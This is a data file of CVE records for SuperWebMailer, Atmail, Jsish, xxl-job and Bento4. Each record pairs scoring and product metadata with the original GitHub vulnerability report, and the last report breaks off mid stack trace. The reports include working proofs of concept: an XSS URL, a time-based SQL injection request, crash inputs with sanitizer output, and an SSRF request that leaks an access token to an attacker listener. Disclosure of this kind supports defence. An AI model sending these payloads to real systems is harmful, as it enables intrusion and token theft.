{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Hebing123/cve/issues/14" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:superwebmailer:superwebmailer:9.31.0.01799:*:*:*:*:*:*:*", "matchCriteriaId": "E69A9B02-9E6A-421A-8E38-9A315640DD73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Hebing123/cve/issues/14
[ "Exploit", "Issue Tracking" ]
github.com
[ "Hebing123", "cve" ]
### **Summary** SuperWebMailer 9.31.0.01799 has a reflective cross-site vulnerability. ### **Details** SuperWebMailer in version 9.31.0.01799 has a reflection cross-site attack vulnerability caused by api.php directly referencing urls without filtering. ### **Proof of Concept (POC)** http://ip:port/api/api.php/%3Cscript%3Ealert(1)%3C/script%3E **Test case** https://newsletter-software-php-script.superwebmailer.de/api/api.php/%3Cscript%3Ealert(1)%3C/script%3E ![image](https://github.com/Hebing123/cve/assets/66168888/2601336e-34c9-4baa-b9da-456c68d3c999) Zugangsdaten zur Anmeldung Benutzername: demo Kennwort: demo ### **Impact** If a user or administrator accesses the malicious url, the cookie may be obtained by an attacker.
SuperWebMailer 9.31.0.01799 has a reflective XSS vulnerability
https://api.github.com/repos/Hebing123/cve/issues/14/comments
1
2024-01-12T18:45:40Z
2024-03-11T06:20:34Z
https://github.com/Hebing123/cve/issues/14
2,079,480,963
14
CVE-2024-24133
2024-02-07T14:15:52.820
Atmail v6.6.0 was discovered to contain a SQL injection vulnerability via the username parameter on the login page.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Hebing123/cve/issues/16" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:atmail:atmail:6.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F9DFF09-D9A8-46F7-A466-6C538C591651", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:atmail:atmail:6.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2AAACF14-FBF7-4790-BCF8-92FA053C7EEF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Hebing123/cve/issues/16
[ "Third Party Advisory" ]
github.com
[ "Hebing123", "cve" ]
### **Summary** On January 12, we discovered that atmail 6.6.0 and atmail 6.3.0 weretested for SQL injection vulnerabilities that could be larger than 6.6.0. The username parameter during admin login is at risk of SQL injection. ### **Details** We can prove this with delayed SQL injection, which we have testedon versions 6.6.0 and 6.3.0 and proved to have SQL injection vulnerabilities. ### **Proof of Concept (POC)** ``` POST /index.php/admin/index/login HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: https://ip:port/ Content-Length: 153 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: ip:port Connection: Keep-alive Language=ca&Password=1&Username=admin'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z&login=1&send=1&server=https://ip:port/ ``` As shown in the figure, a delay of 6 seconds proves that the injected SQL statement: sleep(6) has been executed. ![image](https://github.com/Hebing123/cve/assets/66168888/a4ece9aa-ea9f-4fe5-bad5-1616723f10de) As shown in the figure, a delay of 10 seconds proves that the injected SQL statement: sleep(10) has been executed. ![image](https://github.com/Hebing123/cve/assets/66168888/db77b33d-9750-4a22-9e83-0b01c4c631cc) ### **Impact** 1. Leakage of user privacy informationstored in the database; 2. Tamper with some web pages byoperating the database; 3. modify the value of some fieldsin the database, embed the network horse link, and mount the horse attack; 4. the database server was maliciouslyoperated, the system administrator account was tampered with; 5. the database server providesoperating system support, so that hackers can modify or control the operating system.
SQL Injection Vulnerability in Atmail 6.6.0
https://api.github.com/repos/Hebing123/cve/issues/16/comments
2
2024-01-16T06:20:56Z
2024-03-11T06:17:35Z
https://github.com/Hebing123/cve/issues/16
2,083,096,416
16
CVE-2024-24186
2024-02-07T14:15:52.870
Jsish v3.5.0 (commit 42c694c) was discovered to contain a stack-overflow via the component IterGetKeysCallback at /jsish/src/jsiValue.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/98" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/pcmacdon/jsish/issues/98
[ "Exploit", "Vendor Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: https://github.com/pcmacdon/jsish/commit/42c694c152f7f4fbee34d5e14be37d6e0d09673f Version: v3.5.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh export JSI__SANITIZE=1 make ``` ###### Test case <details><summary>testcase</summary> <p> ```javascript var a = { length : 3 } ; a. length = 10 ; a. foo = [ ] ; a [ 0 ] = " bar " ; [ " bar " ] ; a [ 3 ] = null ; Object. setPrototypeOf ( Object. getPrototypeOf ( a ), Array. prototype ) ; Object. setPrototypeOf ( a, String. prototype ) ; var r ; Object. keys ( a ) ; var t = Object. keys ( a ). length ; var l = 1 ; r = " vieraıra " + l + " straır ". substring ( - 50 ) ; r [ 2 ] = r [ 2 ] ( 0, 15 ) ; r [ 2 ] = r [ 2 ] ; r [ 0 ] = r [ 0 ] + 1 ; String ( r [ 3 ] ) && r [ 0 ] > l ; l = null ; l = l == null ; l = l || Boolean ( " " ) ; l ; ``` </p> </details> ```javascript // poc.js var a = { } ; Object. setPrototypeOf ( Object. getPrototypeOf ( a ), Array. prototype ) ; Object. keys ( a ) ; ``` ###### Execution steps & Output ``` $ ./jsish/jsish poc.js AddressSanitizer:DEADLYSIGNAL ================================================================= ==2355298==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd839b9ff8 (pc 0x000000506531 bp 0x000000000000 sp 0x7ffd839ba000 T0) #0 0x506531 in IterGetKeysCallback ./jsish/src/jsiValue.c:1451 #1 0x617d46 in tree_inorder ./jsish/src/jsiTree.c:836:9 #2 0x617cbf in tree_inorder ./jsish/src/jsiTree.c:833:13 #3 0x617e1e in tree_inorder ./jsish/src/jsiTree.c:840:13 #4 0x617cbf in tree_inorder ./jsish/src/jsiTree.c:833:13 #5 0x617e1e in tree_inorder ./jsish/src/jsiTree.c:840:13 #6 0x617e1e in tree_inorder ./jsish/src/jsiTree.c:840:13 #7 0x617e1e in tree_inorder ./jsish/src/jsiTree.c:840:13 #8 0x61710f in Jsi_TreeWalk ./jsish/src/jsiTree.c:914:16 #9 0x4ff066 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1496:5 #10 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #11 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #12 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #13 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 .... #244 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #245 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #246 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #247 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #248 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 SUMMARY: AddressSanitizer: stack-overflow ./jsish/src/jsiValue.c:1451 in IterGetKeysCallback ==2355298==ABORTING ``` --- when executed in release mode ###### Outputs ``` Segmentation fault ``` Credits: @Ye0nny, @EJueon of the seclab-yonsei.
stack-overflow ./jsish/src/jsiValue.c:1451 in IterGetKeysCallback
https://api.github.com/repos/pcmacdon/jsish/issues/98/comments
0
2024-01-14T11:31:14Z
2024-01-14T11:31:14Z
https://github.com/pcmacdon/jsish/issues/98
2,080,689,779
98
CVE-2024-24188
2024-02-07T14:15:52.917
Jsish v3.5.0 was discovered to contain a heap-buffer-overflow in ./src/jsiUtils.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/100" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/pcmacdon/jsish/issues/100
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: https://github.com/pcmacdon/jsish/commit/42c694c152f7f4fbee34d5e14be37d6e0d09673f Version: v3.5.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh export JSI__SANITIZE=1 make ``` ###### Test case <details><summary>testcase</summary> <p> ```javascript try { var a = " a aaaa ". repeat ( 1 + 100 << 16 ). split ( ) ; JSON. parse ( parse ( JSON. stringify ) ) ; } catch ( a ) { } JSON. stringify ( + a ) ; ``` </p> </details> ```javascript // poc.js try { var a = " a aaaa ". repeat ( 1 + 100 << 16 ). split ( ) ; } catch ( a ) { } ``` ###### Execution steps & Output ``` $ ./jsish/jsish poc.js max alloc exceeded 104857600Jsi_DSSetLength src/jsiDString.c:196 max alloc exceeded 211812358Jsi_DSSetLength src/jsiDString.c:196 ================================================================= ==3965184==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f2d8707c900 at pc 0x00000049123e bp 0x7ffefcbaf3e0 sp 0x7ffefcbaeba0 WRITE of size 52953081 at 0x7f2d8707c900 thread T0 #0 0x49123d in strcpy (./jsish/jsish+0x49123d) #1 0x5525eb in SplitChar ./jsish/src/jsiUtils.c:2061:5 #2 0x5525eb in Jsi_SplitStr ./jsish/src/jsiUtils.c:2315:16 #3 0x579c25 in StringSplitCmd ./jsish/src/jsiString.c:78:9 #4 0x5592da in jsi_FuncCallSub ./jsish/src/jsiProto.c:244:22 #5 0x78812a in jsiFunctionSubCall ./jsish/src/jsiEval.c:796:10 #6 0x766920 in jsiEvalFunction ./jsish/src/jsiEval.c:837:17 #7 0x766920 in jsiEvalCodeSub ./jsish/src/jsiEval.c:1269:25 #8 0x780f26 in jsi_evalcode ./jsish/src/jsiEval.c:2227:10 #9 0x78396f in jsi_evalStrFile ./jsish/src/jsiEval.c #10 0x74a726 in Jsi_EvalFile ./jsish/src/jsiEval.c:2729:12 #11 0x5176d5 in Jsi_Main ./jsish/src/jsiInterp.c:936:18 #12 0xdefaa3 in jsi_main ./jsish/src/main.c:47:26 #13 0x7f2d90778082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #14 0x42c9bd in _start (./jsish/jsish+0x42c9bd) 0x7f2d8707c900 is located 0 bytes to the right of 100000000-byte region [0x7f2d8111e800,0x7f2d8707c900) allocated by thread T0 here: #0 0x4a5419 in realloc (./jsish/jsish+0x4a5419) #1 0x535f91 in Jsi_Realloc ./jsish/src/jsiUtils.c:47:15 SUMMARY: AddressSanitizer: heap-buffer-overflow (./jsish/jsish+0x49123d) in strcpy Shadow bytes around the buggy address: 0x0fe630e078d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe630e078e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe630e078f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe630e07900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe630e07910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0fe630e07920:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe630e07930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe630e07940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe630e07950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe630e07960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe630e07970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3965184==ABORTING ``` Credits: @Ye0nny, @EJueon of the seclab-yonsei.
heap-buffer-overflow in ./jsish/src/jsiUtils.c
https://api.github.com/repos/pcmacdon/jsish/issues/100/comments
0
2024-01-20T05:53:20Z
2024-01-20T05:53:20Z
https://github.com/pcmacdon/jsish/issues/100
2,091,916,967
100
CVE-2024-24189
2024-02-07T14:15:52.967
Jsish v3.5.0 (commit 42c694c) was discovered to contain a use-after-free via the SplitChar at ./src/jsiUtils.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Vendor Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/101" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/pcmacdon/jsish/issues/101
[ "Vendor Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: https://github.com/pcmacdon/jsish/commit/42c694c152f7f4fbee34d5e14be37d6e0d09673f Version: v3.5.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh export JSI__SANITIZE=1 make ``` ###### Test case <details><summary>testcase</summary> <p> ```javascript try { var a = " a aaaa ". repeat ( 1 + 100 << 16 ). trim ( ). split ( ) ; JSON. parse ( parse ( JSON. stringify ) ) ; } catch ( a ) { } JSON. stringify ( + a ) ; ``` </p> </details> ```javascript // poc.js try { var a = " a aaaa ". repeat ( 1 + 100 << 16 ). trim ( ). split ( ) ; } catch ( a ) { } ``` ###### Execution steps & Output ``` $ ./jsish/jsish poc.js max alloc exceeded 104857600Jsi_DSSetLength src/jsiDString.c:196 max alloc exceeded 211812340Jsi_DSSetLength src/jsiDString.c:196 ================================================================= ==3962909==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f069b6bb7e8 at pc 0x000000552d3a bp 0x7fff816e51c0 sp 0x7fff816e51b8 WRITE of size 8 at 0x7f069b6bb7e8 thread T0 #0 0x552d39 in SplitChar ./jsish/src/jsiUtils.c:2060:17 #1 0x552d39 in Jsi_SplitStr ./jsish/src/jsiUtils.c:2315:16 #2 0x579c25 in StringSplitCmd ./jsish/src/jsiString.c:78:9 #3 0x5592da in jsi_FuncCallSub ./jsish/src/jsiProto.c:244:22 #4 0x78812a in jsiFunctionSubCall ./jsish/src/jsiEval.c:796:10 #5 0x766920 in jsiEvalFunction ./jsish/src/jsiEval.c:837:17 #6 0x766920 in jsiEvalCodeSub ./jsish/src/jsiEval.c:1269:25 #7 0x780f26 in jsi_evalcode ./jsish/src/jsiEval.c:2227:10 #8 0x78396f in jsi_evalStrFile ./jsish/src/jsiEval.c #9 0x74a726 in Jsi_EvalFile ./jsish/src/jsiEval.c:2729:12 #10 0x5176d5 in Jsi_Main ./jsish/src/jsiInterp.c:936:18 #11 0xdefaa3 in jsi_main ./jsish/src/main.c:47:26 #12 0x7f06aa752082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #13 0x42c9bd in _start (./jsish/jsish+0x42c9bd) 0x7f069b6bb7e8 is located 5885928 bytes inside of 100000000-byte region [0x7f069b11e800,0x7f06a107c900) freed by thread T0 here: #0 0x4a4e7d in free (./jsish/jsish+0x4a4e7d) #1 0x6047d4 in Jsi_ObjFree ./jsish/src/jsiObj.c:326:17 previously allocated by thread T0 here: #0 0x4a5419 in realloc (./jsish/jsish+0x4a5419) #1 0x535f91 in Jsi_Realloc ./jsish/src/jsiUtils.c:47:15 SUMMARY: AddressSanitizer: heap-use-after-free ./jsish/src/jsiUtils.c:2060:17 in SplitChar Shadow bytes around the buggy address: 0x0fe1536cf6a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf6b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf6c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf6d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf6e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd =>0x0fe1536cf6f0: fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd 0x0fe1536cf700: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf710: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf720: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf730: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf740: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3962909==ABORTING ``` Credits: @Ye0nny, @EJueon of the seclab-yonsei.
heap-use-after-free ./jsish/src/jsiUtils.c:2060:17 in SplitChar
https://api.github.com/repos/pcmacdon/jsish/issues/101/comments
0
2024-01-20T05:58:02Z
2024-01-20T05:58:02Z
https://github.com/pcmacdon/jsish/issues/101
2,091,919,351
101
CVE-2024-24113
2024-02-08T13:15:09.807
xxl-job =< 2.4.1 has a Server-Side Request Forgery (SSRF) vulnerability, which causes low-privileged users to control executor to RCE.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xuxueli/xxl-job/issues/3375" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xuxueli:xxl-job:*:*:*:*:*:*:*:*", "matchCriteriaId": "1C421D48-E483-44C2-A4A9-F0FBC31E17C7", "versionEndExcluding": null, "versionEndIncluding": "2.4.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/xuxueli/xxl-job/issues/3375
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xuxueli", "xxl-job" ]
### Which version of XXL-JOB do you using? 2.4.1(latest) ### vulnerability description XXL-JOB is a distributed task scheduling platform based on java language in the XXL (XXL-JOB) community. There is an SSRF vulnerability in xxl-job-2.4.1/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobInfoController.java of Xxl-job 2.4.1, which originates from /trigger, it directly sends a request to the address specified by addressList without judging whether the addressList parameter is the valid executor address. It can make the SSRF vulnerability, the attacker obtains XXL-JOB-ACCESS-TOKEN and calls any executor, causing the execution of arbitrary commands of the executor. The /trigger interface call only needs to be a low Privilege user of the platform。 ### Steps to reproduce the behavior condition: - XXL-JOB <= 2.4.1 (latest version) - Regular user account - Know a JobId (which can be obtained by traversal) 1. Create a normal user normal without any executor permissions。 ![image](https://github.com/xuxueli/xxl-job/assets/75994739/70215ba6-88aa-436c-ada9-97ca4c5db57e) ![image](https://github.com/xuxueli/xxl-job/assets/75994739/22f99c97-c202-4ce9-9da9-f25ddb799cd9) 2. When using the normal user to call the interface, set the input parameter addressList to the http server address , and print the XXL-JOB-ACCESS-TOKEN directly on the target server ```http POST /xxl-job-admin/jobinfo/trigger HTTP/1.1 Host: 10.248.28.212:8080 Content-Length: 69 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://10.248.28.212:8080 Referer: http://10.248.28.212:8080/xxl-job-admin/jobinfo Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: XXL_JOB_LOGIN_IDENTITY=7b226964223a322c22757365726e616d65223a2274657374222c2270617373776f7264223a226531306164633339343962613539616262653536653035376632306638383365222c22726f6c65223a302c227065726d697373696f6e223a22227d Connection: close id=1&executorParam=test&addressList=http%3A%2F%2F10.248.28.212%3A9999 ``` ![image](https://github.com/xuxueli/xxl-job/assets/75994739/a6da8db9-9329-4f90-bad2-299349a4513c) 3. nc in vps ![image](https://github.com/xuxueli/xxl-job/assets/75994739/c31d9786-a1cd-419e-acc2-4a2ef61bac8a) 4. Use the token to call the task trigger interface of the executor Restful API to execute arbitrary commands ### Other information the vulnerability is similar to the CVE-2022-43183
xxl-job =< 2.4.1 version has SSRF vulnerability, which causes low-privileged users to control executor to RCE
https://api.github.com/repos/xuxueli/xxl-job/issues/3375/comments
1
2024-01-11T12:24:35Z
2024-04-17T08:45:56Z
https://github.com/xuxueli/xxl-job/issues/3375
2,076,500,051
3,375
CVE-2024-25451
2024-02-09T15:15:09.143
Bento4 v1.6.0-640 was discovered to contain an out-of-memory bug via the AP4_DataBuffer::ReallocateBuffer() function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/872" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-640:*:*:*:*:*:*:*", "matchCriteriaId": "8C7DB535-F27C-455F-9E99-3EF80B828022", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/872
[ "Exploit", "Issue Tracking" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, Thanks for fixing the issue #741, but still there is out-of-memory bug in the latest version (1.6.0-640) of multiple programs because of the function AP4_DataBuffer::ReallocateBuffer() at Ap4DataBuffer.cpp:210. We observed the same bug in mp4info, mp42aac, mp42avc, mp4decrypt, and mp4dump with the same root cause. Here is the output of program with address sanitizer attached. ### Bug Report ================================================================= ==977537==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x8021ffba bytes #0 0x7fb17bc08787 in operator new[](unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 #1 0x557daf86f117 in AP4_DataBuffer::ReallocateBuffer(unsigned int) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x557daf86f319 in AP4_DataBuffer::SetDataSize(unsigned int) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DataBuffer.cpp:151 #3 0x557daf8c68b2 in AP4_AudioSampleEntry::ReadFields(AP4_ByteStream&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:502 #4 0x557daf8c5d98 in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:108 #5 0x557daf8cc2dd in AP4_AudioSampleEntry::AP4_AudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:420 #6 0x557daf8cc3d2 in AP4_MpegAudioSampleEntry::AP4_MpegAudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:655 #7 0x557daf8cc3d2 in AP4_Mp4aSampleEntry::AP4_Mp4aSampleEntry(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:844 #8 0x557daf850a3b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, 